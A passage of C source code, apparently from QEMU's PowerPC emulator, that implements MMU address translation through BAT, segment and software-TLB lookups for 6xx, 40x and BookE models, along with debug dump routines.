*BATlt, *BATut, *BATu, *BATl; target_ulong BEPIl, BEPIu, bl; int i, valid, prot; int ret = -1; LOG_BATS("%s: %cBAT v " TARGET_FMT_lx "\n", __func__, type == ACCESS_CODE ? 'I' : 'D', virtual); switch (type) { case ACCESS_CODE: BATlt = env->IBAT[1]; BATut = env->IBAT[0]; break; default: BATlt = env->DBAT[1]; BATut = env->DBAT[0]; break; } for (i = 0; i < env->nb_BATs; i++) { BATu = &BATut[i]; BATl = &BATlt[i]; BEPIu = *BATu & 0xF0000000; BEPIl = *BATu & 0x0FFE0000; bat_size_prot(env, &bl, &valid, &prot, BATu, BATl); LOG_BATS("%s: %cBAT%d v " TARGET_FMT_lx " BATu " TARGET_FMT_lx " BATl " TARGET_FMT_lx "\n", __func__, type == ACCESS_CODE ? 'I' : 'D', i, virtual, *BATu, *BATl); if ((virtual & 0xF0000000) == BEPIu && ((virtual & 0x0FFE0000) & ~bl) == BEPIl) { /* BAT matches */ if (valid != 0) { /* Get physical address */ ctx->raddr = (*BATl & 0xF0000000) | ((virtual & 0x0FFE0000 & bl) | (*BATl & 0x0FFE0000)) | (virtual & 0x0001F000); /* Compute access rights */ ctx->prot = prot; ret = check_prot(ctx->prot, rw, type); if (ret == 0) { LOG_BATS("BAT %d match: r " TARGET_FMT_plx " prot=%c%c\n", i, ctx->raddr, ctx->prot & PAGE_READ ? 'R' : '-', ctx->prot & PAGE_WRITE ? 'W' : '-'); } break; } } } if (ret < 0) { #if defined(DEBUG_BATS) if (qemu_log_enabled()) { LOG_BATS("no BAT match for " TARGET_FMT_lx ":\n", virtual); for (i = 0; i < 4; i++) { BATu = &BATut[i]; BATl = &BATlt[i]; BEPIu = *BATu & 0xF0000000; BEPIl = *BATu & 0x0FFE0000; bl = (*BATu & 0x00001FFC) << 15; LOG_BATS("%s: %cBAT%d v " TARGET_FMT_lx " BATu " TARGET_FMT_lx " BATl " TARGET_FMT_lx "\n\t" TARGET_FMT_lx " " TARGET_FMT_lx " " TARGET_FMT_lx "\n", __func__, type == ACCESS_CODE ? 'I' : 'D', i, virtual, *BATu, *BATl, BEPIu, BEPIl, bl); } } #endif } /* No hit */ return ret; } /* Perform segment based translation */ static inline int get_segment_6xx_tlb(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong eaddr, int rw, int type) { #if 0 PowerPCCPU *cpu = env_archcpu(env); #endif hwaddr hash; target_ulong vsid; int ds, pr, target_page_bits; int ret; target_ulong sr, pgidx; pr = msr_pr; ctx->eaddr = eaddr; sr = env->sr[eaddr >> 28]; ctx->key = (((sr & 0x20000000) && (pr != 0)) || ((sr & 0x40000000) && (pr == 0))) ? 1 : 0; ds = sr & 0x80000000 ? 1 : 0; ctx->nx = sr & 0x10000000 ? 1 : 0; vsid = sr & 0x00FFFFFF; target_page_bits = TARGET_PAGE_BITS; #if 0 qemu_log_mask(CPU_LOG_MMU, "Check segment v=" TARGET_FMT_lx " %d " TARGET_FMT_lx " nip=" TARGET_FMT_lx " lr=" TARGET_FMT_lx " ir=%d dr=%d pr=%d %d t=%d\n", eaddr, (int)(eaddr >> 28), sr, env->nip, env->lr, (int)msr_ir, (int)msr_dr, pr != 0 ? 
1 : 0, rw, type); #endif pgidx = (eaddr & ~SEGMENT_MASK_256M) >> target_page_bits; hash = vsid ^ pgidx; ctx->ptem = (vsid << 7) | (pgidx >> 10); #if 0 qemu_log_mask(CPU_LOG_MMU, "pte segment: key=%d ds %d nx %d vsid " TARGET_FMT_lx "\n", ctx->key, ds, ctx->nx, vsid); #endif ret = -1; if (!ds) { /* Check if instruction fetch is allowed, if needed */ if (type != ACCESS_CODE || ctx->nx == 0) { /* Page address translation */ #if 0 qemu_log_mask(CPU_LOG_MMU, "htab_base " TARGET_FMT_plx " htab_mask " TARGET_FMT_plx " hash " TARGET_FMT_plx "\n", ppc_hash32_hpt_base(cpu), ppc_hash32_hpt_mask(cpu), hash); #endif ctx->hash[0] = hash; ctx->hash[1] = ~hash; /* Initialize real address with an invalid value */ #ifdef _MSC_VER ctx->raddr = (hwaddr)(0ULL - 1ULL); #else ctx->raddr = (hwaddr)-1ULL; #endif /* Software TLB search */ ret = ppc6xx_tlb_check(env, ctx, eaddr, rw, type); #if defined(DUMP_PAGE_TABLES) if (qemu_loglevel_mask(CPU_LOG_MMU)) { CPUState *cs = env_cpu(env); hwaddr curaddr; uint32_t a0, a1, a2, a3; #if 0 qemu_log("Page table: " TARGET_FMT_plx " len " TARGET_FMT_plx "\n", ppc_hash32_hpt_base(cpu), ppc_hash32_hpt_mask(env) + 0x80); #endif for (curaddr = ppc_hash32_hpt_base(cpu); curaddr < (ppc_hash32_hpt_base(cpu) + ppc_hash32_hpt_mask(cpu) + 0x80); curaddr += 16) { a0 = ldl_phys(cs->as, curaddr); a1 = ldl_phys(cs->as, curaddr + 4); a2 = ldl_phys(cs->as, curaddr + 8); a3 = ldl_phys(cs->as, curaddr + 12); if (a0 != 0 || a1 != 0 || a2 != 0 || a3 != 0) { qemu_log(TARGET_FMT_plx ": %08x %08x %08x %08x\n", curaddr, a0, a1, a2, a3); } } } #endif } else { #if 0 qemu_log_mask(CPU_LOG_MMU, "No access allowed\n"); #endif ret = -3; } } else { target_ulong sr; #if 0 qemu_log_mask(CPU_LOG_MMU, "direct store...\n"); #endif /* Direct-store segment : absolutely *BUGGY* for now */ /* * Direct-store implies a 32-bit MMU. * Check the Segment Register's bus unit ID (BUID). */ sr = env->sr[eaddr >> 28]; if ((sr & 0x1FF00000) >> 20 == 0x07f) { /* * Memory-forced I/O controller interface access * * If T=1 and BUID=x'07F', the 601 performs a memory * access to SR[28-31] LA[4-31], bypassing all protection * mechanisms. */ ctx->raddr = ((sr & 0xF) << 28) | (eaddr & 0x0FFFFFFF); ctx->prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return 0; } switch (type) { case ACCESS_INT: /* Integer load/store : only access allowed */ break; case ACCESS_CODE: /* No code fetch is allowed in direct-store areas */ return -4; case ACCESS_FLOAT: /* Floating point load/store */ return -4; case ACCESS_RES: /* lwarx, ldarx or srwcx. */ return -4; case ACCESS_CACHE: /* * dcba, dcbt, dcbtst, dcbf, dcbi, dcbst, dcbz, or icbi * * Should make the instruction do no-op. 
As it already do * no-op, it's quite easy :-) */ ctx->raddr = eaddr; return 0; case ACCESS_EXT: /* eciwx or ecowx */ return -4; default: #if 0 qemu_log_mask(CPU_LOG_MMU, "ERROR: instruction should not need " "address translation\n"); #endif return -4; } if ((rw == 1 || ctx->key != 1) && (rw == 0 || ctx->key != 0)) { ctx->raddr = eaddr; ret = 2; } else { ret = -2; } } return ret; } /* Generic TLB check function for embedded PowerPC implementations */ static int ppcemb_tlb_check(CPUPPCState *env, ppcemb_tlb_t *tlb, hwaddr *raddrp, target_ulong address, uint32_t pid, int ext, int i) { target_ulong mask; /* Check valid flag */ if (!(tlb->prot & PAGE_VALID)) { return -1; } mask = ~(tlb->size - 1); LOG_SWTLB("%s: TLB %d address " TARGET_FMT_lx " PID %u <=> " TARGET_FMT_lx " " TARGET_FMT_lx " %u %x\n", __func__, i, address, pid, tlb->EPN, mask, (uint32_t)tlb->PID, tlb->prot); /* Check PID */ if (tlb->PID != 0 && tlb->PID != pid) { return -1; } /* Check effective address */ if ((address & mask) != tlb->EPN) { return -1; } *raddrp = (tlb->RPN & mask) | (address & ~mask); if (ext) { /* Extend the physical address to 36 bits */ *raddrp |= (uint64_t)(tlb->RPN & 0xF) << 32; } return 0; } /* Generic TLB search function for PowerPC embedded implementations */ static int ppcemb_tlb_search(CPUPPCState *env, target_ulong address, uint32_t pid) { ppcemb_tlb_t *tlb; hwaddr raddr; int i, ret; /* Default return value is no match */ ret = -1; for (i = 0; i < env->nb_tlb; i++) { tlb = &env->tlb.tlbe[i]; if (ppcemb_tlb_check(env, tlb, &raddr, address, pid, 0, i) == 0) { ret = i; break; } } return ret; } /* Helpers specific to PowerPC 40x implementations */ static inline void ppc4xx_tlb_invalidate_all(CPUPPCState *env) { ppcemb_tlb_t *tlb; int i; for (i = 0; i < env->nb_tlb; i++) { tlb = &env->tlb.tlbe[i]; tlb->prot &= ~PAGE_VALID; } tlb_flush(env_cpu(env)); } static int mmu40x_get_physical_address(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong address, int rw, int access_type) { ppcemb_tlb_t *tlb; hwaddr raddr; int i, ret, zsel, zpr, pr; ret = -1; #ifdef _MSC_VER raddr = (hwaddr)(0ULL - 1ULL); #else raddr = (hwaddr)-1ULL; #endif pr = msr_pr; for (i = 0; i < env->nb_tlb; i++) { tlb = &env->tlb.tlbe[i]; if (ppcemb_tlb_check(env, tlb, &raddr, address, env->spr[SPR_40x_PID], 0, i) < 0) { continue; } zsel = (tlb->attr >> 4) & 0xF; zpr = (env->spr[SPR_40x_ZPR] >> (30 - (2 * zsel))) & 0x3; LOG_SWTLB("%s: TLB %d zsel %d zpr %d rw %d attr %08x\n", __func__, i, zsel, zpr, rw, tlb->attr); /* Check execute enable bit */ switch (zpr) { case 0x2: if (pr != 0) { goto check_perms; } /* fall through */ case 0x3: /* All accesses granted */ ctx->prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; ret = 0; break; case 0x0: if (pr != 0) { /* Raise Zone protection fault. 
*/ env->spr[SPR_40x_ESR] = 1 << 22; ctx->prot = 0; ret = -2; break; } /* fall through */ case 0x1: check_perms: /* Check from TLB entry */ ctx->prot = tlb->prot; ret = check_prot(ctx->prot, rw, access_type); if (ret == -2) { env->spr[SPR_40x_ESR] = 0; } break; } if (ret >= 0) { ctx->raddr = raddr; LOG_SWTLB("%s: access granted " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, ctx->raddr, ctx->prot, ret); return 0; } } LOG_SWTLB("%s: access refused " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, raddr, ctx->prot, ret); return ret; } void store_40x_sler(CPUPPCState *env, uint32_t val) { /* XXX: TO BE FIXED */ if (val != 0x00000000) { cpu_abort(env_cpu(env), "Little-endian regions are not supported by now\n"); } env->spr[SPR_405_SLER] = val; } static inline int mmubooke_check_tlb(CPUPPCState *env, ppcemb_tlb_t *tlb, hwaddr *raddr, int *prot, target_ulong address, int rw, int access_type, int i) { int ret, prot2; if (ppcemb_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID], !env->nb_pids, i) >= 0) { goto found_tlb; } if (env->spr[SPR_BOOKE_PID1] && ppcemb_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID1], 0, i) >= 0) { goto found_tlb; } if (env->spr[SPR_BOOKE_PID2] && ppcemb_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID2], 0, i) >= 0) { goto found_tlb; } LOG_SWTLB("%s: TLB entry not found\n", __func__); return -1; found_tlb: if (msr_pr != 0) { prot2 = tlb->prot & 0xF; } else { prot2 = (tlb->prot >> 4) & 0xF; } /* Check the address space */ if (access_type == ACCESS_CODE) { if (msr_ir != (tlb->attr & 1)) { LOG_SWTLB("%s: AS doesn't match\n", __func__); return -1; } *prot = prot2; if (prot2 & PAGE_EXEC) { LOG_SWTLB("%s: good TLB!\n", __func__); return 0; } LOG_SWTLB("%s: no PAGE_EXEC: %x\n", __func__, prot2); ret = -3; } else { if (msr_dr != (tlb->attr & 1)) { LOG_SWTLB("%s: AS doesn't match\n", __func__); return -1; } *prot = prot2; if ((!rw && prot2 & PAGE_READ) || (rw && (prot2 & PAGE_WRITE))) { LOG_SWTLB("%s: found TLB!\n", __func__); return 0; } LOG_SWTLB("%s: PAGE_READ/WRITE doesn't match: %x\n", __func__, prot2); ret = -2; } return ret; } static int mmubooke_get_physical_address(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong address, int rw, int access_type) { ppcemb_tlb_t *tlb; hwaddr raddr; int i, ret; ret = -1; #ifdef _MSC_VER raddr = (hwaddr)(0ULL - 1ULL); #else raddr = (hwaddr)-1ULL; #endif for (i = 0; i < env->nb_tlb; i++) { tlb = &env->tlb.tlbe[i]; ret = mmubooke_check_tlb(env, tlb, &raddr, &ctx->prot, address, rw, access_type, i); if (ret != -1) { break; } } if (ret >= 0) { ctx->raddr = raddr; LOG_SWTLB("%s: access granted " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, ctx->raddr, ctx->prot, ret); } else { LOG_SWTLB("%s: access refused " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, raddr, ctx->prot, ret); } return ret; } static void booke206_flush_tlb(CPUPPCState *env, int flags, const int check_iprot) { int tlb_size; int i, j; ppcmas_tlb_t *tlb = env->tlb.tlbm; for (i = 0; i < BOOKE206_MAX_TLBN; i++) { if (flags & (1 << i)) { tlb_size = booke206_tlb_size(env, i); for (j = 0; j < tlb_size; j++) { if (!check_iprot || !(tlb[j].mas1 & MAS1_IPROT)) { tlb[j].mas1 &= ~MAS1_VALID; } } } tlb += booke206_tlb_size(env, i); } tlb_flush(env_cpu(env)); } static hwaddr booke206_tlb_to_page_size(CPUPPCState *env, ppcmas_tlb_t *tlb) { int tlbm_size; tlbm_size = (tlb->mas1 & MAS1_TSIZE_MASK) >> MAS1_TSIZE_SHIFT; return 1024ULL << tlbm_size; } /* TLB check function for MAS based 
SoftTLBs */ static int ppcmas_tlb_check(CPUPPCState *env, ppcmas_tlb_t *tlb, hwaddr *raddrp, target_ulong address, uint32_t pid) { hwaddr mask; uint32_t tlb_pid; if (!msr_cm) { /* In 32bit mode we can only address 32bit EAs */ address = (uint32_t)address; } /* Check valid flag */ if (!(tlb->mas1 & MAS1_VALID)) { return -1; } mask = ~(booke206_tlb_to_page_size(env, tlb) - 1); LOG_SWTLB("%s: TLB ADDR=0x" TARGET_FMT_lx " PID=0x%x MAS1=0x%x MAS2=0x%" PRIx64 " mask=0x%" HWADDR_PRIx " MAS7_3=0x%" PRIx64 " MAS8=0x%" PRIx32 "\n", __func__, address, pid, tlb->mas1, tlb->mas2, mask, tlb->mas7_3, tlb->mas8); /* Check PID */ tlb_pid = (tlb->mas1 & MAS1_TID_MASK) >> MAS1_TID_SHIFT; if (tlb_pid != 0 && tlb_pid != pid) { return -1; } /* Check effective address */ if ((address & mask) != (tlb->mas2 & MAS2_EPN_MASK)) { return -1; } if (raddrp) { *raddrp = (tlb->mas7_3 & mask) | (address & ~mask); } return 0; } static bool is_epid_mmu(int mmu_idx) { return mmu_idx == PPC_TLB_EPID_STORE || mmu_idx == PPC_TLB_EPID_LOAD; } static uint32_t mmubooke206_esr(int mmu_idx, bool rw) { uint32_t esr = 0; if (rw) { esr |= ESR_ST; } if (is_epid_mmu(mmu_idx)) { esr |= ESR_EPID; } return esr; } /* * Get EPID register given the mmu_idx. If this is regular load, * construct the EPID access bits from current processor state * * Get the effective AS and PR bits and the PID. The PID is returned * only if EPID load is requested, otherwise the caller must detect * the correct EPID. Return true if valid EPID is returned. */ static bool mmubooke206_get_as(CPUPPCState *env, int mmu_idx, uint32_t *epid_out, bool *as_out, bool *pr_out) { if (is_epid_mmu(mmu_idx)) { uint32_t epidr; if (mmu_idx == PPC_TLB_EPID_STORE) { epidr = env->spr[SPR_BOOKE_EPSC]; } else { epidr = env->spr[SPR_BOOKE_EPLC]; } *epid_out = (epidr & EPID_EPID) >> EPID_EPID_SHIFT; *as_out = !!(epidr & EPID_EAS); *pr_out = !!(epidr & EPID_EPR); return true; } else { *as_out = msr_ds; *pr_out = msr_pr; return false; } } /* Check if the tlb found by hashing really matches */ static int mmubooke206_check_tlb(CPUPPCState *env, ppcmas_tlb_t *tlb, hwaddr *raddr, int *prot, target_ulong address, int rw, int access_type, int mmu_idx) { int ret; int prot2 = 0; uint32_t epid; bool as, pr; bool use_epid = mmubooke206_get_as(env, mmu_idx, &epid, &as, &pr); if (!use_epid) { if (ppcmas_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID]) >= 0) { goto found_tlb; } if (env->spr[SPR_BOOKE_PID1] && ppcmas_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID1]) >= 0) { goto found_tlb; } if (env->spr[SPR_BOOKE_PID2] && ppcmas_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID2]) >= 0) { goto found_tlb; } } else { if (ppcmas_tlb_check(env, tlb, raddr, address, epid) >= 0) { goto found_tlb; } } LOG_SWTLB("%s: TLB entry not found\n", __func__); return -1; found_tlb: if (pr) { if (tlb->mas7_3 & MAS3_UR) { prot2 |= PAGE_READ; } if (tlb->mas7_3 & MAS3_UW) { prot2 |= PAGE_WRITE; } if (tlb->mas7_3 & MAS3_UX) { prot2 |= PAGE_EXEC; } } else { if (tlb->mas7_3 & MAS3_SR) { prot2 |= PAGE_READ; } if (tlb->mas7_3 & MAS3_SW) { prot2 |= PAGE_WRITE; } if (tlb->mas7_3 & MAS3_SX) { prot2 |= PAGE_EXEC; } } /* Check the address space and permissions */ if (access_type == ACCESS_CODE) { /* There is no way to fetch code using epid load */ assert(!use_epid); if (msr_ir != ((tlb->mas1 & MAS1_TS) >> MAS1_TS_SHIFT)) { LOG_SWTLB("%s: AS doesn't match\n", __func__); return -1; } *prot = prot2; if (prot2 & PAGE_EXEC) { LOG_SWTLB("%s: good TLB!\n", __func__); return 0; } LOG_SWTLB("%s: no PAGE_EXEC: 
%x\n", __func__, prot2); ret = -3; } else { if (as != ((tlb->mas1 & MAS1_TS) >> MAS1_TS_SHIFT)) { LOG_SWTLB("%s: AS doesn't match\n", __func__); return -1; } *prot = prot2; if ((!rw && prot2 & PAGE_READ) || (rw && (prot2 & PAGE_WRITE))) { LOG_SWTLB("%s: found TLB!\n", __func__); return 0; } LOG_SWTLB("%s: PAGE_READ/WRITE doesn't match: %x\n", __func__, prot2); ret = -2; } return ret; } static int mmubooke206_get_physical_address(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong address, int rw, int access_type, int mmu_idx) { ppcmas_tlb_t *tlb; hwaddr raddr; int i, j, ret; ret = -1; #ifdef _MSC_VER raddr = (hwaddr)(0ULL - 1ULL); #else raddr = (hwaddr)-1ULL; #endif for (i = 0; i < BOOKE206_MAX_TLBN; i++) { int ways = booke206_tlb_ways(env, i); for (j = 0; j < ways; j++) { tlb = booke206_get_tlbm(env, i, address, j); if (!tlb) { continue; } ret = mmubooke206_check_tlb(env, tlb, &raddr, &ctx->prot, address, rw, access_type, mmu_idx); if (ret != -1) { goto found_tlb; } } } found_tlb: if (ret >= 0) { ctx->raddr = raddr; #if 0 LOG_SWTLB("%s: access granted " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, ctx->raddr, ctx->prot, ret); #endif } else { #if 0 LOG_SWTLB("%s: access refused " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, raddr, ctx->prot, ret); #endif } return ret; } #if 0 static const char *book3e_tsize_to_str[32] = { "1K", "2K", "4K", "8K", "16K", "32K", "64K", "128K", "256K", "512K", "1M", "2M", "4M", "8M", "16M", "32M", "64M", "128M", "256M", "512M", "1G", "2G", "4G", "8G", "16G", "32G", "64G", "128G", "256G", "512G", "1T", "2T" }; static void mmubooke_dump_mmu(CPUPPCState *env) { ppcemb_tlb_t *entry; int i; if (kvm_enabled() && !env->kvm_sw_tlb) { qemu_printf("Cannot access KVM TLB\n"); return; } qemu_printf("\nTLB:\n"); qemu_printf("Effective Physical Size PID Prot " "Attr\n"); entry = &env->tlb.tlbe[0]; for (i = 0; i < env->nb_tlb; i++, entry++) { hwaddr ea, pa; target_ulong mask; uint64_t size = (uint64_t)entry->size; char size_buf[20]; /* Check valid flag */ if (!(entry->prot & PAGE_VALID)) { continue; } mask = ~(entry->size - 1); ea = entry->EPN & mask; pa = entry->RPN & mask; /* Extend the physical address to 36 bits */ pa |= (hwaddr)(entry->RPN & 0xF) << 32; if (size >= 1 * MiB) { snprintf(size_buf, sizeof(size_buf), "%3" PRId64 "M", size / MiB); } else { snprintf(size_buf, sizeof(size_buf), "%3" PRId64 "k", size / KiB); } qemu_printf("0x%016" PRIx64 " 0x%016" PRIx64 " %s %-5u %08x %08x\n", (uint64_t)ea, (uint64_t)pa, size_buf, (uint32_t)entry->PID, entry->prot, entry->attr); } } static void mmubooke206_dump_one_tlb(CPUPPCState *env, int tlbn, int offset, int tlbsize) { ppcmas_tlb_t *entry; int i; qemu_printf("\nTLB%d:\n", tlbn); qemu_printf("Effective Physical Size TID TS SRWX" " URWX WIMGE U0123\n"); entry = &env->tlb.tlbm[offset]; for (i = 0; i < tlbsize; i++, entry++) { hwaddr ea, pa, size; int tsize; if (!(entry->mas1 & MAS1_VALID)) { continue; } tsize = (entry->mas1 & MAS1_TSIZE_MASK) >> MAS1_TSIZE_SHIFT; size = 1024ULL << tsize; ea = entry->mas2 & ~(size - 1); pa = entry->mas7_3 & ~(size - 1); qemu_printf("0x%016" PRIx64 " 0x%016" PRIx64 " %4s %-5u %1u S%c%c%c" "U%c%c%c %c%c%c%c%c U%c%c%c%c\n", (uint64_t)ea, (uint64_t)pa, book3e_tsize_to_str[tsize], (entry->mas1 & MAS1_TID_MASK) >> MAS1_TID_SHIFT, (entry->mas1 & MAS1_TS) >> MAS1_TS_SHIFT, entry->mas7_3 & MAS3_SR ? 'R' : '-', entry->mas7_3 & MAS3_SW ? 'W' : '-', entry->mas7_3 & MAS3_SX ? 'X' : '-', entry->mas7_3 & MAS3_UR ? 'R' : '-', entry->mas7_3 & MAS3_UW ? 
'W' : '-', entry->mas7_3 & MAS3_UX ? 'X' : '-', entry->mas2 & MAS2_W ? 'W' : '-', entry->mas2 & MAS2_I ? 'I' : '-', entry->mas2 & MAS2_M ? 'M' : '-', entry->mas2 & MAS2_G ? 'G' : '-', entry->mas2 & MAS2_E ? 'E' : '-', entry->mas7_3 & MAS3_U0 ? '0' : '-', entry->mas7_3 & MAS3_U1 ? '1' : '-', entry->mas7_3 & MAS3_U2 ? '2' : '-', entry->mas7_3 & MAS3_U3 ? '3' : '-'); } } static void mmubooke206_dump_mmu(CPUPPCState *env) { int offset = 0; int i; #if 0 if (kvm_enabled() && !env->kvm_sw_tlb) { qemu_printf("Cannot access KVM TLB\n"); return; } #endif for (i = 0; i < BOOKE206_MAX_TLBN; i++) { int size = booke206_tlb_size(env, i); if (size == 0) { continue; } mmubooke206_dump_one_tlb(env, i, offset, size); offset += size; } } static void mmu6xx_dump_BATs(CPUPPCState *env, int type) { target_ulong *BATlt, *BATut, *BATu, *BATl; target_ulong BEPIl, BEPIu, bl; int i; switch (type) { case ACCESS_CODE: BATlt = env->IBAT[1]; BATut = env->IBAT[0]; break; default: BATlt = env->DBAT[1]; BATut = env->DBAT[0]; break; } for (i = 0; i < env->nb_BATs; i++) { BATu = &BATut[i]; BATl = &BATlt[i]; BEPIu = *BATu & 0xF0000000; BEPIl = *BATu & 0x0FFE0000; bl = (*BATu & 0x00001FFC) << 15; qemu_printf("%s BAT%d BATu " TARGET_FMT_lx " BATl " TARGET_FMT_lx "\n\t" TARGET_FMT_lx " " TARGET_FMT_lx " " TARGET_FMT_lx "\n", type == ACCESS_CODE ? "code" : "data", i, *BATu, *BATl, BEPIu, BEPIl, bl); } } static void mmu6xx_dump_mmu(CPUPPCState *env) { PowerPCCPU *cpu = env_archcpu(env); ppc6xx_tlb_t *tlb; target_ulong sr; int type, way, entry, i; qemu_printf("HTAB base = 0x%"HWADDR_PRIx"\n", ppc_hash32_hpt_base(cpu)); qemu_printf("HTAB mask = 0x%"HWADDR_PRIx"\n", ppc_hash32_hpt_mask(cpu)); qemu_printf("\nSegment registers:\n"); for (i = 0; i < 32; i++) { sr = env->sr[i]; if (sr & 0x80000000) { qemu_printf("%02d T=%d Ks=%d Kp=%d BUID=0x%03x " "CNTLR_SPEC=0x%05x\n", i, sr & 0x80000000 ? 1 : 0, sr & 0x40000000 ? 1 : 0, sr & 0x20000000 ? 1 : 0, (uint32_t)((sr >> 20) & 0x1FF), (uint32_t)(sr & 0xFFFFF)); } else { qemu_printf("%02d T=%d Ks=%d Kp=%d N=%d VSID=0x%06x\n", i, sr & 0x80000000 ? 1 : 0, sr & 0x40000000 ? 1 : 0, sr & 0x20000000 ? 1 : 0, sr & 0x10000000 ? 1 : 0, (uint32_t)(sr & 0x00FFFFFF)); } } qemu_printf("\nBATs:\n"); mmu6xx_dump_BATs(env, ACCESS_INT); mmu6xx_dump_BATs(env, ACCESS_CODE); if (env->id_tlbs != 1) { qemu_printf("ERROR: 6xx MMU should have separated TLB" " for code and data\n"); } qemu_printf("\nTLBs [EPN EPN + SIZE]\n"); for (type = 0; type < 2; type++) { for (way = 0; way < env->nb_ways; way++) { for (entry = env->nb_tlb * type + env->tlb_per_way * way; entry < (env->nb_tlb * type + env->tlb_per_way * (way + 1)); entry++) { tlb = &env->tlb.tlb6[entry]; qemu_printf("%s TLB %02d/%02d way:%d %s [" TARGET_FMT_lx " " TARGET_FMT_lx "]\n", type ? "code" : "data", entry % env->nb_tlb, env->nb_tlb, way, pte_is_valid(tlb->pte0) ? 
"valid" : "inval", tlb->EPN, tlb->EPN + TARGET_PAGE_SIZE); } } } } #endif void dump_mmu(CPUPPCState *env) { #if 0 switch (env->mmu_model) { case POWERPC_MMU_BOOKE: mmubooke_dump_mmu(env); break; case POWERPC_MMU_BOOKE206: mmubooke206_dump_mmu(env); break; case POWERPC_MMU_SOFT_6xx: case POWERPC_MMU_SOFT_74xx: mmu6xx_dump_mmu(env); break; #if defined(TARGET_PPC64) case POWERPC_MMU_64B: case POWERPC_MMU_2_03: case POWERPC_MMU_2_06: case POWERPC_MMU_2_07: dump_slb(env_archcpu(env)); break; case POWERPC_MMU_3_00: if (ppc64_v3_radix(env_archcpu(env))) { /* TODO - Unsupported */ } else { dump_slb(env_archcpu(env)); break; } #endif default: qemu_log_mask(LOG_UNIMP, "%s: unimplemented\n", __func__); } #endif } static inline int check_physical(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong eaddr, int rw) { int in_plb, ret; ctx->raddr = eaddr; ctx->prot = PAGE_READ | PAGE_EXEC; ret = 0; switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: case POWERPC_MMU_SOFT_74xx: case POWERPC_MMU_SOFT_4xx: case POWERPC_MMU_REAL: case POWERPC_MMU_BOOKE: ctx->prot |= PAGE_WRITE; break; case POWERPC_MMU_SOFT_4xx_Z: if (unlikely(msr_pe != 0)) { /* * 403 family add some particular protections, using * PBL/PBU registers for accesses with no translation. */ in_plb = /* Check PLB validity */ (env->pb[0] < env->pb[1] && /* and address in plb area */ eaddr >= env->pb[0] && eaddr < env->pb[1]) || (env->pb[2] < env->pb[3] && eaddr >= env->pb[2] && eaddr < env->pb[3]) ? 1 : 0; if (in_plb ^ msr_px) { /* Access in protected area */ if (rw == 1) { /* Access is not allowed */ ret = -2; } } else { /* Read-write access is allowed */ ctx->prot |= PAGE_WRITE; } } break; default: /* Caller's checks mean we should never get here for other models */ abort(); return -1; } return ret; } static int get_physical_address_wtlb( CPUPPCState *env, mmu_ctx_t *ctx, target_ulong eaddr, int rw, int access_type, int mmu_idx) { int ret = -1; bool real_mode = (access_type == ACCESS_CODE && msr_ir == 0) || (access_type != ACCESS_CODE && msr_dr == 0); switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: case POWERPC_MMU_SOFT_74xx: if (real_mode) { ret = check_physical(env, ctx, eaddr, rw); } else { /* Try to find a BAT */ if (env->nb_BATs != 0) { ret = get_bat_6xx_tlb(env, ctx, eaddr, rw, access_type); } if (ret < 0) { /* We didn't match any BAT entry or don't have BATs */ ret = get_segment_6xx_tlb(env, ctx, eaddr, rw, access_type); } } break; case POWERPC_MMU_SOFT_4xx: case POWERPC_MMU_SOFT_4xx_Z: if (real_mode) { ret = check_physical(env, ctx, eaddr, rw); } else { ret = mmu40x_get_physical_address(env, ctx, eaddr, rw, access_type); } break; case POWERPC_MMU_BOOKE: ret = mmubooke_get_physical_address(env, ctx, eaddr, rw, access_type); break; case POWERPC_MMU_BOOKE206: ret = mmubooke206_get_physical_address(env, ctx, eaddr, rw, access_type, mmu_idx); break; case POWERPC_MMU_MPC8xx: /* XXX: TODO */ cpu_abort(env_cpu(env), "MPC8xx MMU model is not implemented\n"); break; case POWERPC_MMU_REAL: if (real_mode) { ret = check_physical(env, ctx, eaddr, rw); } else { cpu_abort(env_cpu(env), "PowerPC in real mode do not do any translation\n"); return -1; } break; default: cpu_abort(env_cpu(env), "Unknown or invalid MMU model\n"); return -1; } return ret; } static int get_physical_address( CPUPPCState *env, mmu_ctx_t *ctx, target_ulong eaddr, int rw, int access_type) { return get_physical_address_wtlb(env, ctx, eaddr, rw, access_type, 0); } hwaddr ppc_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = 
&cpu->env; mmu_ctx_t ctx; switch (env->mmu_model) { #if defined(TARGET_PPC64) case POWERPC_MMU_64B: case POWERPC_MMU_2_03: case POWERPC_MMU_2_06: case POWERPC_MMU_2_07: return ppc_hash64_get_phys_page_debug(cpu, addr); case POWERPC_MMU_3_00: return ppc64_v3_get_phys_page_debug(cpu, addr); #endif case POWERPC_MMU_32B: case POWERPC_MMU_601: return ppc_hash32_get_phys_page_debug(cpu, addr); default: ; } if (unlikely(get_physical_address(env, &ctx, addr, 0, ACCESS_INT) != 0)) { /* * Some MMUs have separate TLBs for code and data. If we only * try an ACCESS_INT, we may not be able to read instructions * mapped by code TLBs, so we also try a ACCESS_CODE. */ if (unlikely(get_physical_address(env, &ctx, addr, 0, ACCESS_CODE) != 0)) { return -1; } } return ctx.raddr & TARGET_PAGE_MASK; } static void booke206_update_mas_tlb_miss(CPUPPCState *env, target_ulong address, int rw, 